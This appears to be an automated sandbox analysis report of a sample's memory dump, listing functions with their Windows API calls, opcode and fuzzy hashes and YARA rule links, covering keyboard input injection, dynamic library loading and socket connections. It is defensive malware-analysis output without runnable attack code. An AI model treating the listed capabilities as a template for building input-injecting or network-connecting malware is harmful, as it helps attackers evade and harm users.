API String ID: 3691411573-0
Opcode ID: e3e676b48b1f626e50bf6e9f798a7acc683daddffe0263af23b25abfe6b8b65f
Instruction ID: 82ba368dd0fbbb561b687f5ab856dbcd2f39e326d7879b38617afc1b576cd53c
Opcode Fuzzy Hash: e3e676b48b1f626e50bf6e9f798a7acc683daddffe0263af23b25abfe6b8b65f
Instruction Fuzzy Hash: CD116D71304301ABEB21DE69ECC8A5A7BACFB48321F104659FA84DB2C5C735D8858F60

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7199, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00FF70BF: DeleteObject.GDI32(00000000), ref: 00FF70FC
Part of subcall function 00FF70BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00FF713C
Part of subcall function 00FF70BF: SelectObject.GDI32(?,00000000), ref: 00FF714C
Part of subcall function 00FF70BF: BeginPath.GDI32(?), ref: 00FF7161
Part of subcall function 00FF70BF: SelectObject.GDI32(?,00000000), ref: 00FF718A

MoveToEx.GDI32(?,?,?,00000000), ref: 00FF71C4
LineTo.GDI32(?,?,?), ref: 00FF71D0
MoveToEx.GDI32(?,?,?,00000000), ref: 00FF71DE
LineTo.GDI32(?,?,?), ref: 00FF71EA
EndPath.GDI32(?), ref: 00FF71FA
StrokePath.GDI32(?), ref: 00FF7208

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
String ID:
API String ID: 372113273-0
Opcode ID: 49bb4164de2833d915caa7d8676de176a9e2ebee3504e77c1183bb0a6747c46e
Instruction ID: 9328913237d6bac9f99ec6cffa659d3e4c62570d54ab929268d0e95e113aa6d8
Opcode Fuzzy Hash: 49bb4164de2833d915caa7d8676de176a9e2ebee3504e77c1183bb0a6747c46e
Instruction Fuzzy Hash: 1401F77A101218BBE721AB44EC4DFEBBB6CEF4A710F144105FB41A61C5C7B92941CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00FBF010, Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FBF048
MapVirtualKeyW.USER32(00000010,00000000), ref: 00FBF050
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FBF05B
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FBF066
MapVirtualKeyW.USER32(00000011,00000000), ref: 00FBF06E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBF076

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: e54a66e038051fef3ed8f6c391236ddbc854cda2d9b45e2df9b19601a56575c9
Instruction ID: ecaff4f1ce06a197593dc6d3303aa9265326d948d31220349aad1857d6f5f81b
Opcode Fuzzy Hash: e54a66e038051fef3ed8f6c391236ddbc854cda2d9b45e2df9b19601a56575c9
Instruction Fuzzy Hash: AE016770106B88ADD3309F668C84B43FEF8EF95704F01490DD1D507A42C6B5A84CCB69

Uniqueness

Uniqueness Score: -1.00%

Function 00FFB5C7, Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00FFB5E1
EnterCriticalSection.KERNEL32(?), ref: 00FFB5F2
TerminateThread.KERNEL32(?,000001F6), ref: 00FFB600
WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 00FFB60E

Part of subcall function 00FE25E5: CloseHandle.KERNEL32(00000000), ref: 00FE25F3

InterlockedExchange.KERNEL32(?,000001F6), ref: 00FFB623
LeaveCriticalSection.KERNEL32(?), ref: 00FFB62A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 9243448b0fa4675066f371867f734ccd51a8e86dee4854373c9c2a7afe5dc89f
Instruction ID: 80bf7c1e38236231075bce66c139fbb7d726d2d55fbd6317e401f3cd82fc1002
Opcode Fuzzy Hash: 9243448b0fa4675066f371867f734ccd51a8e86dee4854373c9c2a7afe5dc89f
Instruction Fuzzy Hash: 4DF0AF72541201BBC260AB60ED88DABB77CFF44321B400526FA4292540CB3AA411CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FC50DB, Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 00FC50E0

Part of subcall function 00FC77D1: TlsGetValue.KERNEL32 ref: 00FC77DA
Part of subcall function 00FC77D1: TlsSetValue.KERNEL32(00000000,?,00FC12DC,?,00000001), ref: 00FC77FB

___fls_getvalue@4.LIBCMT ref: 00FC50EB

Part of subcall function 00FC77B1: TlsGetValue.KERNEL32 ref: 00FC77BF

___fls_setvalue@8.LIBCMT ref: 00FC50FD
GetLastError.KERNEL32(00000000,?,00000000), ref: 00FC5106
ExitThread.KERNEL32 ref: 00FC510D
__freefls@4.LIBCMT ref: 00FC5129

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 442100245-0
Opcode ID: 25f920ccb2089561977d2a3da0686a9a1e07bceeed0bb5e4917884c676430df5
Instruction ID: 1088bcd6b6bf5eafc24df146aecded66993d07a4a5f9318b3528d6b3654867fb
Opcode Fuzzy Hash: 25f920ccb2089561977d2a3da0686a9a1e07bceeed0bb5e4917884c676430df5
Instruction Fuzzy Hash: F8F08278504706ABD708BF70CF4BF0A3B999F48710320C45CB90487217DA3DD882EEA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF83D9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00FF8492
IsMenu.USER32(?), ref: 00FF84A6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FF84F4
DrawMenuBar.USER32 ref: 00FF8508

Strings

0, xrefs: 00FF83F3

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 899c10e44ae5fe1be6664604dfe407ea267147545be36d58cd4496eb19c35fa4
Instruction ID: 450cfe6821546a06bea3ec9413a0fa0750c6979141a239689f8ca5646aa3e3f7
Opcode Fuzzy Hash: 899c10e44ae5fe1be6664604dfe407ea267147545be36d58cd4496eb19c35fa4
Instruction Fuzzy Hash: 1E41BF75A00209DFCB20CF55D884FEA77B9FF48364F14811AEA459B294CB75A845DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00FF3346, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?), ref: 00FF3376

Strings

nul, xrefs: 00FF33EC

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle
String ID: nul
API String ID: 2519475695-2873401336
Opcode ID: 1649bd5bd7fcfeb2e7767089fa366ac3581aa545314fe3e382ca4fd6b17bcc3e
Instruction ID: 97d096a3b7090fb966cb280a099d0babee1f78ea695fc41d81dc9113fb70b1be
Opcode Fuzzy Hash: 1649bd5bd7fcfeb2e7767089fa366ac3581aa545314fe3e382ca4fd6b17bcc3e
Instruction Fuzzy Hash: B831A271A01309ABD720DF68DC45BAA77ACEF44320F104649FE90DB2D0EB75DA50EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FF3253, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00FF3281

Strings

nul, xrefs: 00FF32F8

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle
String ID: nul
API String ID: 2519475695-2873401336
Opcode ID: ccfb967149ef37bfbee54d2e85167b34eae168be3f820b884525f93d7ea9c670
Instruction ID: ae5c539fa4baa037616cba6b28c25b1f30920b7352946a4ab41c865bc452bd7b
Opcode Fuzzy Hash: ccfb967149ef37bfbee54d2e85167b34eae168be3f820b884525f93d7ea9c670
Instruction Fuzzy Hash: CC214131A00208ABD720DF68DC45BAAB7A8DF55330F14474AFEA0962D0E7759A50D791

Uniqueness

Uniqueness Score: -1.00%

Function 0100D435, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0100D446
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0100D4BC
__swprintf.LIBCMT ref: 0100D4D6
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0100D51A

Strings

%lu, xrefs: 0100D4D0

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 606f08561278e2886f3176431928efed712972f1b21da9ac492f251bf85e038d
Instruction ID: e494ab2051c93a2098a758304fee7e865e22cfbab7a36aa2d1409ca748b7b910
Opcode Fuzzy Hash: 606f08561278e2886f3176431928efed712972f1b21da9ac492f251bf85e038d
Instruction Fuzzy Hash: A0314C72A00209AFDB14EF95DC85EEEB7B8FF88300F108559E605AB251D735EA05DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 010112A0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FB2390: _wcslen.LIBCMT ref: 00FB239D
Part of subcall function 00FB2390: _memmove.LIBCMT ref: 00FB23C3

Part of subcall function 00FE6406: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FE6425
Part of subcall function 00FE6406: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FE6438
Part of subcall function 00FE6406: GetCurrentThreadId.KERNEL32(00000000), ref: 00FE643F
Part of subcall function 00FE6406: AttachThreadInput.USER32(00000000), ref: 00FE6446

GetFocus.USER32 ref: 010112C7

Part of subcall function 00FE6451: GetParent.USER32(?), ref: 00FE645F
Part of subcall function 00FE6451: GetParent.USER32(?), ref: 00FE646B

GetClassNameW.USER32(?,?,00000100), ref: 01011310
EnumChildWindows.USER32 ref: 0101133B
__swprintf.LIBCMT ref: 01011354

Strings

%s%d, xrefs: 0101134E

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
String ID: %s%d
API String ID: 2645982514-1110647743
Opcode ID: 7d6b755d8a60b15df9e3e06677a56ef47157031f32d3904e98103c8c7230ea41
Instruction ID: 5ad6691f2b44e2998a05dd3a718dcc8487bc43b39f89a73fc431609d0ee46714
Opcode Fuzzy Hash: 7d6b755d8a60b15df9e3e06677a56ef47157031f32d3904e98103c8c7230ea41
Instruction Fuzzy Hash: D02181715007196BD620EF69DC85FEBB7ECEF89710F00800AFA59D7241DA78A905AB71

Uniqueness

Uniqueness Score: -1.00%

Function 00FFC2F0, Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FFC348
SetKeyboardState.USER32(00000080), ref: 00FFC36C
PostMessageW.USER32 ref: 00FFC3B0
PostMessageW.USER32 ref: 00FFC3E8
SendInput.USER32(00000001,?,0000001C), ref: 00FFC475

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardMessagePostState$InputSend
String ID:
API String ID: 3031425849-0
Opcode ID: 8ebbd614faf2288f8020b28aa666f2ca198e14b9879bba903949ea502b5cf66b
Instruction ID: 1ac748ad6e5b44055e443cd99ecdd852bf071dfb7e8961707a7d0a6bc8603ae5
Opcode Fuzzy Hash: 8ebbd614faf2288f8020b28aa666f2ca198e14b9879bba903949ea502b5cf66b
Instruction Fuzzy Hash: FA415D7290025C6ADB20DF69DC85BFE7B68EF46360F40C159FE8496182C3399945EBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0101444F, Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0101449A
GetProcAddress.KERNEL32(?,?,?,?,?,?,?), ref: 01014534
GetProcAddress.KERNEL32(?,00000000,?,?,?), ref: 01014553
GetProcAddress.KERNEL32(?,?,?,?,00000041,?,?,?), ref: 01014597
FreeLibrary.KERNEL32(?,?,?,?), ref: 010145B9

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID:
API String ID: 2449869053-0
Opcode ID: 20f1cedf5bf5ce2b2972c94ea5017a1d5076b9619c3e77273738ad53892a8de3
Instruction ID: 2741098b03aa7918a8350caf05f5d758a5aba511255a68d0f3322c871136701e
Opcode Fuzzy Hash: 20f1cedf5bf5ce2b2972c94ea5017a1d5076b9619c3e77273738ad53892a8de3
Instruction Fuzzy Hash: B8513C756002059FDB10EF68CC81AEEB7B9FF48310F148559EA45AB356DB39ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0102D3C9, Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(01057F04), ref: 0102D3F2
InterlockedDecrement.KERNEL32(01057F04), ref: 0102D407
Sleep.KERNEL32(0000000A), ref: 0102D40F
InterlockedIncrement.KERNEL32(01057F04), ref: 0102D41A
InterlockedDecrement.KERNEL32(01057F04), ref: 0102D524

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID:
API String ID: 327565842-0
Opcode ID: d5b1aa022ebd259ab7afcc68e60a3c82af028177a634101b900dc57de0c1b87f
Instruction ID: b4e9062a57ef756e2c981ed5891945b93fe28627a601c29e22400e0cbf342532
Opcode Fuzzy Hash: d5b1aa022ebd259ab7afcc68e60a3c82af028177a634101b900dc57de0c1b87f
Instruction Fuzzy Hash: 4341F371A002299BCB11DFA9DCC89EE77B4FB54300B404159EA86EB346CB39FD05DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0100C3AE, Relevance: 7.6, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 0100C43C
GetPrivateProfileSectionW.KERNEL32 ref: 0100C464
WritePrivateProfileSectionW.KERNEL32 ref: 0100C4B0
WritePrivateProfileStringW.KERNEL32 ref: 0100C4D4
WritePrivateProfileStringW.KERNEL32 ref: 0100C4E3

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: d3e75d5e0279a0c5a970571ef92a2069af254eb828bc0c71defb5716eb9e147c
Instruction ID: 98cc3f4f07b62086c920c3bb663f55d3582821ad5e188f8a2df9512680dc0592
Opcode Fuzzy Hash: d3e75d5e0279a0c5a970571ef92a2069af254eb828bc0c71defb5716eb9e147c
Instruction Fuzzy Hash: D24162B1A00209BFEB10EBA5DC85FAAB3ACFF44304F148599F5449B281DB75E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FF94AE, Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00FF94F1

Part of subcall function 00FE0593: _wcspbrk.LIBCMT ref: 00FE05A3

SendMessageW.USER32(?,00001074,?,?), ref: 00FF9551
_wcslen.LIBCMT ref: 00FF9566
_wcslen.LIBCMT ref: 00FF9573
SendMessageW.USER32(?,00001074,?,?), ref: 00FF95A7

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$_wcslen$_wcspbrk
String ID:
API String ID: 1856069659-0
Opcode ID: 45e712eea3a760b9e3b7a41184d9c3f599023d717f381a46e3b3a4d5497770c7
Instruction ID: 9fbc52bf2db18941738fdaede19227c9b26b17d98a86baab753ef00c77d18af3
Opcode Fuzzy Hash: 45e712eea3a760b9e3b7a41184d9c3f599023d717f381a46e3b3a4d5497770c7
Instruction Fuzzy Hash: D431B471D0421C9BDB20DF55DC81FEEB3B8FF54320F10421AFA1497290E7B199958B90

Uniqueness

Uniqueness Score: -1.00%

Function 01005071, Relevance: 7.6, APIs: 5, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a28c87d4c37addfef814c863cae525b6747b864310555ad03c7eb12e6cb76b4
Instruction ID: fa52c4a9174c58e5f935f5a9b18278cd81b8cd425a702ade1d6738f761eede01
Opcode Fuzzy Hash: 7a28c87d4c37addfef814c863cae525b6747b864310555ad03c7eb12e6cb76b4
Instruction Fuzzy Hash: E12181752042019BE721DF29ECD4D6677ADFF49220F0046A9FA9187385DB35E845CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01015005, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01014E62: inet_addr.WSOCK32(?), ref: 01014E86

socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0101503B
WSAGetLastError.WSOCK32(00000000), ref: 0101504A
connect.WSOCK32(00000000,?,00000010), ref: 01015083
WSAGetLastError.WSOCK32(00000000), ref: 010150AA
closesocket.WSOCK32(00000000,00000000), ref: 010150BE

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$closesocketconnectinet_addrsocket
String ID:
API String ID: 245547762-0
Opcode ID: 9eb48d4b08872647925c5bd976b6ff92d799792c21a663ec03ce111f0c907959
Instruction ID: 24a407bb9fb2ad1a9739d668c3e6faa0d7a282bbd9f1bad645498a23589ad00f
Opcode Fuzzy Hash: 9eb48d4b08872647925c5bd976b6ff92d799792c21a663ec03ce111f0c907959
Instruction Fuzzy Hash: 8C2181312001105FD321EF68DC45FAAB7ECFF55720F008649F995DB291DB75A8419B91

Uniqueness

Uniqueness Score: -1.00%

Function 00FF70BF, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00FF70FC
ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00FF713C
SelectObject.GDI32(?,00000000), ref: 00FF714C
BeginPath.GDI32(?), ref: 00FF7161
SelectObject.GDI32(?,00000000), ref: 00FF718A

Memory Dump Source

Source File: 00000005.00000002.666404503.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000005.00000002.666375737.0000000000FB0000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666478144.0000000001032000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.666500555.0000000001040000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666511025.0000000001041000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.666518899.0000000001042000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666529811.0000000001057000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.666545082.000000000105B000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$BeginCreateDeletePath
String ID:
API String ID: 2338827641-0
Opcode ID: dd60e6b499d2ec3a906c5f00c4a4d5cc09f7d7e7129de433f33f75e5b3627fa3
